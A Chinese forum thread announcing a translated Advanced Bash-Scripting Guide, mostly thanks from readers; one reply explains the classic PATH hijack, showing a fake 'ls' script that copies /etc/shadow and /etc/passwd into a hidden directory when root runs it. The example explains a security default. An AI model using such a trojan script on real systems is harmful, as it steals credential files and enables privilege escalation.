高级Bash脚本编程指南(Advanced Bash-Scripting Guide)：[最新]中文正式3.9.1版发布

linlin911911

惊人的毅力啊，多谢你们的辛勤劳动。

dddddrrrr

"因为由于安全的因素[译者注：如果你感兴趣的话，其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

xyghui

谢谢你们了.真的是功德无量

intact

不错，支持一下。

intact

不错，支持一下。

letueo

kiron的精神让我们感动!

kiron

Post by dddddrrrr;1784755
"因为由于安全的因素[译者注：如果你感兴趣的话，其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

链接我也找不到了。。。在这儿简单说一下吧。
这个漏洞其实很老也很简单，如果是root把当前目录.加到PATH环境变量的开头，
像这样：PATH=.PATH，因为SHELL寻找命令所在的目录时，按PATH变量值中以:分割的各个目录中依次寻找命令。上面这样设置时会使当前目录的优先级最高。
现在有一个恶意用户a,家目录是/home/a，在他的家目录下写了一个脚本，类似像下面的：

1. 
   
2. #!/bin/bash
   
3. mkdir /home/a/.hidden >/dev/null 2>&1
   
4. cp /etc/shadow /etc/passwd /home/a/.hidden >/dev/null 2>&1
   
5. chown -R a.a /home/a/.hidden >/dev/null 2>&1
   
6. /bin/ls
   

复制代码

命名为ls
这样，当ROOT某天在进入a用户的家目录做常规检查时，习惯性的输入ls时，执行的是恶意用户a的脚本，不是/bin/ls，a用户就这样窃取了密码文件。
当然恶意用户目的不一定是窃取密码文件，也可能是做在sudo的配置文件中加入自己为超级用户之类的坏事。

grassroots

辛苦了, 一定要顶一下, 刚进这个论坛,就发现这样的好东东

xingzhel

这么好的东西，不顶真的是对不起编者，谢谢分享，太谢谢了！

lmoking

二位，真是太强了。对我们初学者是一个莫大的帮助。